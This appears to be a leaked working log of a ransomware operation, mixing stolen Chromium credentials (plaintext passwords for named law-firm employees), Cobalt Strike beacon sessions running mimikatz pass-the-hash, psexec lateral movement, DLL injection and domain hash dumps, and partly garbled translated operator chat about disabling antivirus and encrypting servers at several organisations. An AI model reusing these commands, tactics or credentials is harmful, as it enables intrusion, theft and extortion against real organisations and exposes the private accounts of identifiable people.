--- Chromium Credential (User: douglas) ---
URL : https://www.united.com/ual/en/us/account/account/login
Username : LW762392
Password : Natwwal1214
--- Chromium Credential (User: douglas) ---
URL : https://www.united.com/ual/en/us/account/account/login
Username : *****392
Password : Natwwal1214
--- Chromium Credential (User: douglas) ---
URL : https://www.aeroplan.com/log_in.do
Username : 750173031
Password : Anastasia0623
--- Chromium Credential (User: douglas) ---
URL : https://www.southwest.com/air/booking/index.html
Username : 629692276
Password : Natwwal1214
--- Chromium Credential (User: douglas) ---
URL : javascript:;
Username : Brooking
Password : Natwwal1214!
--- Chromium Credential (User: douglas) ---
URL : https://ondemand-relcs-02.fronteo.com/Relativity/Identity/login
Username : doug.brooking@sprouselaw.com
Password : Natwwal1214!
--- Chromium Credential (User: douglas) ---
URL : https://www.marriott.com/aries-auth/loginWithCredentials.comp
Username : 660371613
Password : Natwwal1214
--- Chromium Credential (User: douglas) ---
URL :
Username : 1159185041
Password : Natwwal1214
--- Chromium Credential (User: douglas) ---
URL : https://idp.elliemae.com/as/oopXr/resume/as/authorization.ping
Username : dbrooking1020
Password : Natwwal1214!
--- Chromium Credential (User: douglas) ---
URL : https://scrcxp.pdhi.com/Portal/Member/4cb6782c-b48d-451e-96be-02d2a7b314a3
Username : dbrooking806
Password : Natwwal1214
--- Chromium Credential (User: douglas) ---
URL : https://accounts.myuhc.com/rt/login/myuhc/en
Username :
Password : Natwwal1214!
--- Chromium Credential (User: douglas) ---
URL : https://texasstateparks.reserveamerica.com/memberSignInSignUp.do
Username : douglas.brooking@sprouselaw.com
Password : Geordi9392!
--- Chromium Credential (User: douglas) ---
URL : https://www.hilton.com/en/auth/login/
Username : 938312336
Password : Natwwal1214!
````Mitel/192.168.100.235/dbrooking\douglas Stasia9323``Mitel/192.168.100.235/msadler\matts Sprouse350``Mitel/192.168.100.235twd/msadler\matts Sprouse350` pay special attention to possible system backup
--- Chromium Credential (User: matts) ---
URL : https://www.att.com/my/
Username : matt.sadler@sprouselaw.com
Password : kalley01
--- Chromium Credential (User: matts) ---
URL : https://cprodmasx.att.com/commonLogin/igate_wam/multiLogin.do
Username : matt.sadler@sprouselaw.com
Password : kalley01
--- Chromium Credential (User: matts) ---
URL : https://oidc.idp.clogin.att.com/mga/sps/authsvc
Username : matt.sadler@sprouselaw.com
Password : kalley01
```
`matts-pc [192.168.100.93]````
beacon> pth SPROUSELAW.COM\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:aandaservice /domain:SPROUSELAW.COM /ntlm:1737a8ca4966a1b4cf767232b0a4bd58 /run:"%COMSPEC% /c echo 2e8d2fa8e2b > \.\pipe\4fee59" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : aandaservice
domain : SPROUSELAW.COM
program : C:\WINDOWS\system32\cmd.exe /c echo 2e8d2fa8e2b > \.\pipe\4fee59
impers. : no
NTLM : 1737a8ca4966a1b4cf767232b0a4bd58
| PID 11124
| TID 8532
| LSA Process is now R/W
| LUID 0 ; 1696015470 (00000000:6517246e)
\_ msv1_0 - data copy @ 00000275420FFA80 : OK !
\_ kerberos - data copy @ 000002754222D6C8
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 000002754218E768 (32) -> null
beacon> shell copy x64.dll \192.168.100.227\C$\ProgramData\x64.dll
[*] Tasked beacon to run: copy x64.dll \\\192.168.100.227\C$\ProgramData\x64.dll
[+] host called home, sent: 84 bytes
[+] received output:
The referenced account is currently locked out and may not be logged on to.
0 file(s) copied.
````pth SPROUSELAW.COM\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58````
beacon> pth sprouselaw\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:aandaservice /domain:sprouselaw /ntlm:1737a8ca4966a1b4cf767232b0a4bd58 /run:"%COMSPEC% /c echo b7a7be09788 > \.\pipe\cb0f70" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : aandaservice
domain : sprouselaw
program : C:\WINDOWS\system32\cmd.exe /c echo b7a7be09788 > \\.\pipe\cb0f70
impers. : no
NTLM : 1737a8ca4966a1b4cf767232b0a4bd58
| PID 9896
| TID 936
| LSA Process is now R/W
| LUID 0 ; 1695752222 (00000000:6513201e)
\_ msv1_0 - data copy @ 0000027541E22080 : OK !
\kerberos - data copy @ 0000027541F15C08
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 000002754218FAE8 (32) -> null
``````
user : aandaservice
domain : SPROUSELAW.COM
program : C:\windows\system32\cmd.exe /c echo a093d2314f1 > \\.\pipe\cf9cc0
impers. : no
NTLM : 1737a8ca4966a1b4cf767232b0a4bd58
| PID 19196
| TID 15936
| LSA Process is now R/W
| LUID 0 ; 575605488 (00000000:224f0af0)
\_ msv1_0 - data copy @ 000001FD13FD6080 : OK !
\kerberos - data copy @ 000001FD13E24C88
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
{\_ *Password replace @ 000001FD13F107E8 (32) -> null
``````
pth sprouselaw\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
```
```
The referenced account is currently locked out and may not be logged on to.
``pth sprouselaw\administrator 59ae5e3ea853a81e1dsfsdfsdfse0e3fafbb052qw68455-721-18c line 19 through 37
с 192.168.100.227
to 192.168.100.89https://ru.malwarebytes.com/business/endpoint-protection/``
192.168.100.100
192.168.100.102
192.168.100.103
192.168.100.105
192.168.100.106
192.168.100.107
192.168.100.108
192.168.100.110
192.168.100.111
192.168.100.114
192.168.100.117
192.168.100.118
192.168.100.120
192.168.100.130
192.168.100.134
192.168.100.135
192.168.100.136
192.168.100.138
192.168.100.139
192.168.100.140
192.168.100.142
192.168.100.143
192.168.100.144
192.168.100.145
192.168.100.147
192.168.100.148
192.168.100.150
192.168.100.152
192.168.100.153
192.168.100.154
192.168.100.155
192.168.100.156
192.168.100.158
192.168.100.160
192.168.100.162
192.168.100.164
192.168.100.165
192.168.100.167
192.168.100.168
192.168.100.170
192.168.100.171
192.168.100.172
192.168.100.175
192.168.100.176
192.168.100.182
192.168.100.187
192.168.100.189
192.168.100.196
192.168.100.198
192.168.100.207
192.168.100.218
192.168.100.222
192.168.100.224
192.168.100.226
192.168.100.227
192.168.100.228
192.168.100.229
192.168.100.230
192.168.100.231
192.168.100.232
192.168.100.233
192.168.100.234
192.168.100.235
192.168.100.236
192.168.100.237
192.168.100.238
192.168.100.243
192.168.100.245
192.168.100.246
192.168.100.247
192.168.100.248
192.168.100.89
192.168.100.93
192.168.100.94
192.168.100.95
192.168.100.96
192.168.100.97
192.168.100.98
192.168.100.99
192.168.111.120
192.168.111.134
192.168.111.135
192.168.111.138
192.168.112.117
192.168.112.144
192.168.112.153
192.168.112.154
192.168.112.156
192.168.112.157
192.168.112.158
``cavona kmd5 both by5183 dustintp c2a23920677e464f359320c23947c237 5125235 aandaservice 1737a8ca496a1b4cf767232b0a4bd58 66048 friends who are out of work or sitting in dead-ends - throw your dlkudayLekha shalomUtra in hut, comrades!oday Vovao Semyon helloDayDay, what grids will work?
user3 will try[ ](https://mediaeveryone.com/group/silencershop-com?msg=CoNfDvPLR9LxZZFG6) and by the way did not pass? user3 Add plz @user3
he'll take it from here. I'll try poking around in the code, maybe you have some? No, I can't find an alternative to SharpPrinter and no other implementations?
Unhandled Exception:
Unhandled Exception: System.ArgumentOutOfRangeException: Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: startIndex
at System.String.IndexOf(String value, Int32 startIndex, Int32 count, StringComparison comparisonType)
at System.String.IndexOf(String value, Int32 startIndex)
at SharpPrinter.Program.getSnmp(String host, String OID)
at SharpPrinter.Program.SendArpRequest(IPAddress dst)
at SharpPrinter.Program.<>c__DisplayClass6_0.b__0()
at System.Threading.ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state)
at System.Threading.ThreadHelper.ThreadStart()
System.ArgumentOutOfRangeException: Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: startIndex
at System.String.IndexOf(String value, Int32 startIndex, Int32 count, StringComparison comparisonType)
at System.String.IndexOf(String value, Int32 startIndex)
at SharpPrinter.Program.getSnmp(String host, String OID)
``There must be something in the codeprinters to compile the ehashnik, it doesn't workcitrix no printerscitrixdescription? hell what exactly? gpp empty, hell? What else can I try? No progress so far
no rights up
17-010 empty
xp all ports are closed but pinged
ftp is empty
sql is not online
lockout is zero, ran a storm with passwords found - nothing
no passwords on files and spheres
no kerbs
there is no username anywhere - no password - no kerbs
```
192.168.1.2:445 (platform: 500 version: 10.0 name: SS-DATA2 domain: SilencerShop)
192.168.1.101:445
192.168.1.115:445 (platform: 500 version: 10.0 name: SS-HEATHER domain: SilencerShop)
192.168.1.120:445 (platform: 500 version: 10.0 name: SS-SALES2 domain: SilencerShop)
192.168.1.122:445 (platform: 500 version: 10.0 name: SS-BISCHOFFDESK domain: SilencerShop)
192.168.1.125:445 (platform: 500 version: 10.0 name: DESKTOP-2G463RJ domain: SilencerShop)
192.168.1.126:445 (platform: 500 version: 10.0 name: SS-SALES1 domain: SilencerShop)
192.168.1.133:445 (platform: 500 version: 10.0 name: SS-LMATHENY domain: SilencerShop)
192.168.1.135:445 (platform: 500 version: 10.0 name: NCC-1701 domain: SilencerShop)
[+] received output:
192.168.1.136:445 (platform: 500 version: 10.0 name: SS-SURFACEBOOK2 domain: SilencerShop)
192.168.1.137:445 (platform: 500 version: 10.0 name: SS-AWELLS domain: SilencerShop)
192.168.1.138:445 (platform: 500 version: 10.0 name: SS-BROOKS domain: SilencerShop)
192.168.1.141:445 (platform: 500 version: 10.0 name: SS-MDIONNEJR domain: SilencerShop)
192.168.1.142:445 (platform: 500 version: 10.0 name: DESKTOP-69NK6FB domain: SilencerShop)
192.168.1.144:445 (platform: 500 version: 10.0 name: DESKTOP-T1BM5VF domain: SilencerShop)
192.168.1.147:445 (platform: 500 version: 10.0 name: SS-KBRYMER domain: SilencerShop)
192.168.1.166:445 (platform: 500 version: 10.0 name: SS-KATE domain: SilencerShop)
192.168.1.168:445 (platform: 500 version: 10.0 name: SS-FPTSCAN domain: SilencerShop)
192.168.1.169:445 (platform: 500 version: 10.0 name: SS-MORTEGA domain: SilencerShop)
192.168.1.186:445 (platform: 500 version: 10.0 name: SS-ANDERS domain: SilencerShop)
192.168.1.207:445
192.168.1.214:445 (platform: 500 version: 10.0 name: SS-KCROSS domain: SilencerShop)
``session crashed
win 10 2004 - failed to get up (not LA)
shuffliner is not LA anywhere else
whining is not online
ftp is there but nothing worked
one xp, but all ports are closed
nothing online under 17-010
started scanning sharpPrinter and flew away all the rest what can kerbs no and citrix, kerbs? he is nowhere else lav files also nothing but the password polozakapolzak not la, unlikely to get up there is 1 xp, but all the ports are closed all okrch lagging?)123eyJhbGciOiJB5u6ZbGYV29r41QuWH4DIzKoAQoMa1VQZmtiekbMvCl5T/3SZ664XrpB5FO/sXmyhWKRHfsiPFDdyfjbHTUZysL+n2F70jPhuidpkhYsD0WVCpNNyIzMRaSM7Bal5eRGCos/5KnS/Hc3JBQfS/qO4wbVT+65j4x3VDxt3vHkkA3vj3LrFpeFfdgVw32NX/H5RlPuY7+KiPlfc8Ykzjoo8v/3lw/oja97tUPX5QMcdhpJ5mzcbvA4bELSuyOgLiaBmHg/zxgqXxN+8k66lh504nHn1M2yTJyBcZf6XaJhvCxYP+kjJqJjtwwfdJwZslVx6J06doG7XYUXB/Qwbnajldi9arjFdIS2g45H9MS+g7ZKuwmMNA5SOJkg47qTXcBlHhC88uBl/vA7w9caBjqsI/VLghDwksezgGC2/fx4Mgc9bGBi9foi5s2b/FIL90yJICWDtw4XiF/lRcqnq5aB1mNr5dSSAYL8zdFcfWLcOngSB9s5pcOQ1VaWZIYpVnJMZATX3BRoe8wFX9pVS/H0FOR0HxAqZJGEpII06vgYy7mBAkSObNn4DuqnF2Czy3t06PlYsPScgqTTqJwsq7fBOt1iJxqQBwymX1sZGEwKsnQ5jTJKKyEr2XmIIGHfF12TuaZegJOUG+zhrm7rUd9Pstl0092hLpFKR3UN32eUHQs84kDSw1B+23wZ9B9ypIxbcQzII19e/FHPdria2zyyf8q2I0ehELRStysztoB4uylzBRVVUXzA0TVYHHDEfYU4mQglQEEhvTxd2ZTe2kBufQVhyti/R5pqz7/0JS26BL+8XIEfi7JBShw1UDfbrjb4OYVHslmEqVcZmqMoQNIW+0vCi/SrPaCMGRpguVWxH6tIW2g5C0cKdud5HIop9HdOB4VUS+4rM6a8gBaNeWNX4PQD7/AvTjlTyVdXyQR8aEuxJoIQpLI65ioMcMJaHhhe+GmlJshHVicXUr6CCKqXW/Bobksqat7WlAFgN//rDehSMl2RK hang them up, if you see that they recover - finish it = )from here a couple of sessions came with fsrv and dk - the rdmi is1.done.lrhc.org0.done.lrhc.org and on to #genralThat's it, let's wrap it up. enter + 1 additional net[ ](https://mediaeveryone.com/group/lrhc-org?msg=4vFvHrAH6kSgf5ekp) will not come out, no internet so far in difficilepo classics disassemble and workupon give you a cobu where will fly sessions we have a little time to talk about the process I'm not particularly happy
servers: 5/7 (2 were not attracted)
armas: servers flew away fast, no time to map
Now for the process, let's keep this format for the future
mcklrh.mig
servers: 6/6
Armas: 15 masked, not yet encrypted
ffmg.local
servers: 1/3 (1 did not attract, 1 no kred, not allowed even YES)
armas: not zamapi
ELEAH.LOCAL
servers: 5/7 (2 were not attracted)
Armies: Servers flew away quickly, no time to map
lrhc.local
servers: 171/175 (4 not attracted or mapped, no disks/balls visible)
armas: 791/1040 mapped, cipher in question
´´Well, there are approximate stats not yet? what? contact @ot us router is connecting to the wpn, what's the problem? reboot what? reboot what? @tl1? we have office proxy failed - we cobbed and ready, now we're completing the status, completing what? minutes1 left to get one and a half domains? so what? `ffmg.local\petekuttera e65e7043f9e8c2321284f39e830a51ba`FFMG\Administrator Lexapro421!oxa`mapped to LRHDC02 one and a half domains left to get the scale of the tragedyDescribe the intermediate result10.10.70.5 - mask disks c,d,e on the dk+on the dk, there are still not allowed to do soIs it possible to pull on a blocked server and run the inject on a new one will work? we have several scenarios or shut off AVproblem mapped to another server? does not break his dlk and exeсheck why not block the server `` ``
+] received output:
Host Name: LRH-WDS01
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
```
```
Name Version
Sophos Network Threat Protection 1.10.1051.0
Sophos Anti-Virus 10.8.9.610
Sophos Endpoint Self Help 3.0.217.0
Sophos AutoUpdate XG 6.6.144.0
Sophos Health 2.4.7.0
AppRecovery Agent 6.4.0.718
Sophos Endpoint Agent 2.0.423.0
Sophos Diagnostic Utility 6.5.238.0
Sophos Endpoint Firewall 1.2.0.17 6.1.1.28093
Sophos File Integrity Monitoring 1.0.1.11
If not, if it's not hanging, then the crypt is going on. Check the pid session, skip the ones that fell off while we're working on it. I'll clarify, the file is the first to fall and the crypt is in the next hour if the file appears but the session is dead?
Directory of \10.10.30.211$
06/21/2019 10:29 AM 0 CLRtypes.txt
12/21/2020 02:55 AM Downloads
12/21/2020 06:00 AM 278 ErrorLog.xml
12/21/2020 02:55 AM inetpub
12/21/2020 02:55 AM 849 LABEL_rhollis.txt.PXILP
12/21/2020 02:55 AM Logs
06/21/2019 10:22 AM 0 msxml.txt
07/09/2017 10:03 AM PerfLogs
12/21/2020 02:55 AM Program Files
12/21/2020 02:55 AM Program Files (x86)
12/21/2020 02:55 AM Quarantine
12/21/2020 02:55 AM 1,495 readme.txt
07/02/2019 01:59 PM 0 TW.txt
07/02/2019 01:59 PM 0 TW2.txt
12/21/2020 05:56 AM Users
12/21/2020 05:56 AM Windows
7 File(s) 2,622 bytes
9 Dir(s) 32,827,768,832 bytes free
``kill the av and bang the ehhe reopen and if not alive? If you forget the sessions after the inject should be alive I have my damamil on topnot see the popo and other things maxima`` ``
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 195572 bytes
[+] received output:
Injected.
[+] host called home, sent: 19 bytes
[+] host called home, sent: 20 bytes
``I've opened 3 of the green servers to choose from
marim armaments on it
inject
move on to the next one, someone write down the algorithm that you work out? I do not have a question is relevant I have not finished the last word) where is the logic?
``You guys in my coba have a problem with the massinject?
`
`
Encrypting the servers
`[ ](https://mediaeveryone.com/group/lrhc-org?msg=vnoWXKwqYYFZuN737) [ ](https://mediaeveryone.com/group/lrhc-org?msg=NBDJ4mz4rwxMXPhgm) ``
``Forget the answerI answered you above or I don't understand somethingIs the guys in my coba having a problem with the array? ok[ ](https://mediaeveryone.com/group/lrhc-org?msg=oarSXwdaXmqpFuTXS) forgot to put `- )o worked off the cobaShifterIbahe.If he himself doesn't want tomask his drives on another serverguys in my coba what are you busy with? don't run the ehe from C:\*
Volume in drive C is OS
Volume Serial Number is 584E-4F0A
Directory of C:\
07/13/2009 09:20 PM PerfLogs
02/10/2018 10:06 AM Program Files
10/07/2019 08:20 PM Program Files (x86)
10/16/2017 10:36 AM Quarantine
01/06/2014 02:45 PM temp
06/08/2018 07:52 AM Users
08/20/2020 08:12 PM Windows
0 File(s) 0 bytes
7 Dir(s) 50,698,219,520 bytes free
``and give me more dir C:\to try and change the dir+rights of the system?
Host Name: LRHPROFILES2
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-262-0784995-84931
Original Install Date: 5/24/2011, 9:39:37 PM
System Boot Time: 2/13/2020, 9:16:14 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~2194 Mhz
[02]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~2194 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 4/5/2016
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-06:00) Central Time (US & Canada)
Total Physical Memory: 4.096 MB
Available Physical Memory: 2,107 MB
Virtual Memory: Max Size: 8,189 MB
Virtual Memory: Available: 4,599 MB
Virtual Memory: In Use: 3,590 MB
Page File Location(s): C:\pagefile.sys
Domain: lrhc.local
Logon Server: N/A
Hotfix(s): 128 Hotfix(s) Installed.
[01]: KB981391
[02]: KB981392
[03]: KB977236
[04]: KB981111
[05]: KB977238
[06]: KB2764913
[07]: KB2764916
[08]: KB2718695
[09]: KB977239
[10]: KB2670838
[11]: KB981390
[12]: KB2425227
[13]: KB2446710
[14]: KB2484033
[15]: KB2497640
[16]: KB2503658
[17]: KB2506014
[18]: KB2506212
[19]: KB2506223
[20]: KB2506928
[21]: KB2507618
[22]: KB2508272
[23]: KB2508429
[24]: KB2509553
[25]: KB2510531
[26]: KB2511250
[27]: KB2511455
[28]: KB2515325
[29]: KB2522422
[30]: KB2524375
[31]: KB2533552
[32]: KB2533623
[33]: KB2534366
[34]: KB2536275
[35]: KB2536276
[36]: KB2541014
[37]: KB2544893
[38]: KB2545698
[39]: KB2547666
[40]: KB2552343
[41]: KB2560656
[42]: KB2563227
[43]: KB2564958
[44]: KB2570947
[45]: KB2584146
[46]: KB2585542
[47]: KB2603229
[48]: KB2604115
[49]: KB2607047
[50]: KB2608658
[51]: KB2618451
[52]: KB2620704
[53]: KB2621440
[54]: KB2631813
[55]: KB2639308
[56]: KB2640148
[57]: KB2643719
[58]: KB2645640
[59]: KB2647753
[60]: KB2653956
[61]: KB2654428
[62]: KB2655992
[63]: KB2656356
[64]: KB2660075
[65]: KB2667402
[66]: KB2676562
[67]: KB2685811
[68]: KB2685813
[69]: KB2685939
[70]: KB2690533
[71]: KB2691442
[72]: KB26698365
[73]: KB2699779
[74]: KB2705219
[75]: KB2706045
[76]: KB2709630
[77]: KB2712808
[78]: KB2718704
[79]: KB2719857
[80]: KB2726535
[81]: KB2729094
[82]: KB2729452
[83]: KB2731771
[84]: KB2732059
[85]: KB2742599
[86]: KB2743555
[87]: KB2750841
[88]: KB2753842
[89]: KB2757638
[90]: KB2758857
[91]: KB2761217
[92]: KB2763523
[93]: KB2765809
[94]: KB2770660
[95]: KB2785220
[96]: KB2786081
[97]: KB2786400
[98]: KB2789645
[99]: KB2791765
[100]: KB2798162
[101]: KB2804579
[102]: KB2807986
[103]: KB2808679
[104]: KB2813347
[105]: KB2813430
[106]: KB2820197
[107]: KB2820331
[108]: KB2830290
[109]: KB2833946
[110]: KB2834140
[111]: KB2834886
[112]: KB2839894
[113]: KB2840149
[114]: KB2844286
[115]: KB2849470
[116]: KB2850851
[117]: KB2859537
[118]: KB2861855
[119]: KB2862772
[120]: KB2862966
[121]: KB2863058
[122]: KB2868623
[123]: KB2999226
[124]: KB3154518
[125]: KB4019990
[126]: KB4499175
[127]: KB976902
[128]: KB976932
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es).
[01]: 10.10.39.142
[02]: fe80::f9c5:bb23:5d30:3177
``Av offc:\Windows\Temp all off? where did you start it from? ehversion of the oda updated the same nonsense I'm updating the exeshnik version of the Inge?i can't even see it after a while no udmifile null injected normal workwhy is it possible you have 3 more trusts on top and you went down in minus 40 mins if the coba cut off more likely already know about you in tempeokm retract, retract and immediately put if you do not use session and they knock every 5 sec you imagine what noise you create? if you mapped under token change it and maps should be saved retract ``
10.10.30.173
10.10.30.175
10.10.30.176
10.10.30.177
10.10.30.180
10.10.30.183
10.10.30.196
10.10.30.206
10.10.30.208
10.10.30.210
10.10.30.211
10.10.30.212
10.10.30.222
10.10.30.223
10.10.30.225
10.10.30.226
10.10.30.230
10.10.30.231
10.10.30.244
10.10.30.245
10.10.30.246
10.10.30.247
10.10.30.248
10.10.30.249
10.10.31.70
10.10.37.11
10.10.39.18
10.10.39.40
10.10.39.68
10.10.39.83
10.10.39.85
10.10.39.149
10.10.39.179
10.10.39.180
10.10.39.181
10.10.39.184
10.10.39.186
10.10.39.187
10.10.70.5
169.254.0.2
169.254.0.2
172.23.15.10
you were supposed to be in the trusts for an hour then we're done in the other session, you were kicked out?
beacon> make_token lrhc.local\nmsapps dragon374
[*] Tasked beacon to create a token for lrhc.local\nmsapps
[+] host called home, sent: 46 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
beacon> shell net use * \\10.5.68.221\C$
[*] Tasked beacon to run: net use *\\10.5.68.221\C$
[+] host called home, sent: 57 bytes
beacon> shell net use * \\10.10.222.20\C$
[*] Tasked beacon to run: net use * \\10.10.222.20\C$
[+] host called home, sent: 58 bytes
beacon> shell net use * \\10.5.68.99\C$
[*] Tasked beacon to run: net use *\\\10.5.68.99\C$
[+] host called home, sent: 56 bytes
beacon> shell net use * \\10.91.18.115\C$
[*] Tasked beacon to run: net use *\\\10.91.18.115\C$
[+] host called home, sent: 58 bytes
beacon> shell net use * \\10.5.68.119\C$
[*] Tasked beacon to run: net use *\\\10.5.68.119\C$
[+] host called home, sent: 57 bytes
beacon> shell net use * \\10.10.220.140\C$
[*] Tasked beacon to run: net use *\\10.10.220.140\C$
[+] host called home, sent: 59 bytes
beacon> shell ping 10.10.220.140
[*] Tasked beacon to run: ping 10.10.220.140
[+] host called home, sent: 49 bytes
beacon> shell dir C:\
[*] Tasked beacon to run: dir C:\
[+] host called home, sent: 38 bytes
``Don't touch them, they have my sessions. Take them.
192.254.69.178:25674
VwboHyBv8QTsyelrIDPOEJ2Ee99JlhyiCK4
``Compyping* from the second koba is pinged on all kobas and even trusts? Apparently our koba was cut offSessions is slacking on this server drop everything by hand to put the ehe very interesting OS, process list, edr, available RAMfeedback to the tulchan
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 217711 bytes
[-] relocation truncated to fit (distance between executable code and other data is >4GB)
``then there is a reverse order here, more likely the client itself has not updated the polisy cloud, there is no polisy updatkak and vindef actually did you update it polisy on the clients? sofox is still chopping, although it seems disabledwhy? no, had to arma mapit you already moved to trusts? all pulled up share username=C:/ and since the disk then stop processes and services and unshare them yourself once vmic works) `` ``
beacon> portscan 10.10.30.57 3389
[*] Tasked beacon to scan ports 3389 on 10.10.30.57
[+] host called home, sent: 93405 bytes
[+] received output:
(ICMP) Target '10.10.30.57' is alive. [read 8 bytes]
10.10.30.57:3389
Scanner module is complete
``Check for generalrdp disks?
beacon> jump psexec 10.10.30.57 pipe
[*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_42) on 10.10.30.57 via Service Control Manager (\\10.10.30.57\ADMIN$\22adc14.exe)
[+] host called home, sent: 287864 bytes
[-] could not upload file: 64
[-] Could not start service 22adc14 on 10.10.30.57: 64
[-] Could not connect to pipe: 64
``bindpipe is fighting? Not even a c$...``
beacon> shell wmic /node:10.10.30.57 share get caption,name,path
[*] Tasked beacon to run: wmic /node:10.10.30.57 share get caption,name,path
[+] host called home, sent: 201 bytes
[+] received output:
No Instance(s) Available.
``or even ѕhare request balls via get share from mikane fs?
lrhppathif.lrhc.local
``What's the host? ``10.10.30.57 is still in process Didn't you delete the snaps already?
beacon> execute-assembly SharpSharesNG.exe shares 10.10.30.57
[*] Tasked beacon to run .NET program: SharpSharesNG.exe shares 10.10.30.57
[+] host called home, sent: 129223 bytes
[+] received output:
******* COMPLETE *******
```
```
beacon> shell wmic /node:10.10.30.57 OS get NAME
[*] Tasked beacon to run: wmic /node:10.10.30.57 OS get NAME
[+] host called home, sent: 185 bytes
[+] received output:
Name
Microsoftr Windows Serverr 2008 Standard |C:\Windows|\Device\Harddisk0\Partition1
``buy the sessions and then where not disconnected or do not go if you have the ability to disable the avs - always better through the disconnection of the avs after serverrr then you can through psec disconnect the avs disconnect the avs How decided to do? disconnect avs or map? since the admin is) well then it makes sense chop[ ](https://mediaeveryone.com/group/lrhc-org?msg=yD93e8s4vCEPza2mv) was kindaadmin from sofos no? dk in all domains in the last place the biggest network we had at this stage only here in the tone do it all first pull and map then start everywhere elsehowever no 100 pulled and mapped then start 100 in all 4? sofosMap and start immediately?and what is the av by the way7 then map the disks of the server and then run the builddrival pids and services are those responsible for the database or wiem for example because the hold is not taken off the network from busy filesnado chop services and pidservers that are not attractedbuild out then pull servers map the armies so if it flew into the block not to lose all at oncesessions from the first 3 to 1 kobu not pull in the first 3 domains open sessions and prepare accesses YES to work and start with the last because he is the biggesttut classics 1 kobu 100 servers worked from two with this network how many you have only kobu?`ELEAH.LOCAL`
17 servers
541 armies
`ffmg.local`
9 servers
237 armies
`mcklrh.mig
14 servers
46 armies
`lrhc.local`
289 servers
2,638 armas almost half an hour we have not even begun to give status on all domains. how many servers and armas `APOfi98h&T6GHUs(&*fgTWE` I SharpShares rewrote a little, so they scansharfinder? scan subnets from sabinets - looking for where the admin admin
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
ADM/Domain Admins
Administrator
The command completed successfully.
``fucking LOCALGROUP administrators because you screwed up
beacon> shell net group administrators
[*] Tasked beacon to run: net group administrators
[+] host called home, sent: 55 bytes
[+] received output:
This command can be used only on a Windows Domain Controller.
More help is available by typing NET HELPMSG 3515.
``It's strange that la doesn't show...EA doesn't show, LA doesn't showDC``.
ADMINDC5 10.0.61.13
ADMINDC1 10.0.61.2
ADMINDC3 10.0.61.6
ADMINDC4 10.0.61.7
ADMINDC2 10.0.61.10
SPOCK 10.7.51.3
AZUREDC1 10.221.32.4
``DA``.
administrator ad-script avamar
backup bross CGSUMBUser
ciscowireless citrixdb clusteradmin
id-automation idautosupport installsvcs
kaceinstaller ldelar mandl
mherna02 munis munis2
munis3 mzuvan nsuser
odomin papercut pgalde
philipldap SAM sccmadmin
sccmagent sccmsvc sisdservice
sqlfc support tylerdfs
tylerservice tylersisbackup umra-admin
vdivmm webadmin
``net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 30
Maximum password age (days): 999
Minimum password length: 6
Length of password history maintained: 3
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: BACKUP
The command completed successfully.
``Good job, good job,``
[DC] 'mcklrh.mig' will be the domain
[DC] 'raddc02.mcklrh.mig' will be the DC server
[DC] Exporting domain 'mcklrh.mig'
1001 SUPPORT_388945a0 6f033587ef18aa7281931967f8260e1015 66050
1616 nelson 2d7f1a5a61d3a96fb5159b5eef17adc6 514
1612 tech fbc52e18292b500a3b5a1982e19360d0 514
1151 test2 56ad694bdd191d54b6a49fc7e51d611c 514
1155 test4 28bb5d82dfe78e456c9a4f7c588c8727a 514
1168 t_winacc 71b43a8306d1bb60e84a0bc2400a5a21 512
